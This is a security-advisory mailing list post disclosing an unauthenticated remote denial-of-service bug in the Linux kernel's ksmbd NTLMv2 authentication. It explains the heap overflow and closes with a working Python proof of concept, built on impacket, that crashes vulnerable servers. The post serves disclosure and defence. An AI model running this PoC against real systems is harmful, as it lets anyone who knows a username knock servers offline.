Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 4 Jan 2023 17:35:09 +0100
From: Hrvoje Mišetić <>
Subject: Linux kernel: Unauthenticated remote DOS in ksmbd NTLMv2 authentication

There is a heap overflow bug in ksmbd_decode_ntlmssp_auth_blob in which nt_len
can be less than CIFS_ENCPWD_SIZE. This results in a negative blen argument
for ksmbd_auth_ntlmv2, where it calls memcpy using blen on memory allocated
by kmalloc(blen + CIFS_CRYPTO_KEY_SIZE). Note that CIFS_ENCPWD_SIZE is 16
and CIFS_CRYPTO_KEY_SIZE is 8. We believe this bug can only result in a
remote DOS and not privilege escalation nor RCE, as the heap overflow occurs
when blen is in range (-8, -1]. The resulting overflow will be too large,
and will lead to a kernel panic. When blen is -8, kmalloc returns
ZERO_SIZE_PTR which will cause a null dereference, but the kernel will oops
and will usually continue to function. This bug has existed since 5.15-rc1
and is still present in the upstream source tree, having just been patched
in and is awaiting merging - the commit
ID is 8824b7af409f51f1316e92e9887c2fd48c0b26d6.

We have tested this bug on Ubuntu 20.04 HWE and 22.04 (both running on
5.15.0-56-generic) and can remotely panic the OS immediately. Any attacker
that can access the ksmbd SMB port can easily cause a kernel panic. Note that
while the attacker has to know a valid username for the service, it does not
need to know the password as the bug happens in the challenge-response phase
of ntlmv2 protocol, making this an unauthenticated attack.

Below is a POC to trigger the bug.
from impacket.smbconnection import SMBConnection
import functools
import impacket.ntlm

# using impacket-0.10.0

user = "test"
pw = "test"
domain = "localhost"
address = ""
target_ip = ""
port = "445"

def post_function(function, postfunction):
    def run(*args, **kwargs):
        resp = function(*args, **kwargs)
        return postfunction(resp)
    return run

def post_computeResponseNTLMv2_hook(resp):
    return ('A' * 10, resp[1], resp[2])

impacket.ntlm.computeResponseNTLMv2 = post_function(
    impacket.ntlm.computeResponseNTLMv2, post_computeResponseNTLMv2_hook)

smbClient = SMBConnection(address, target_ip, port)
smbClient.login(user, pw, domain)
Hrvoje Mišetić
William Liu

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.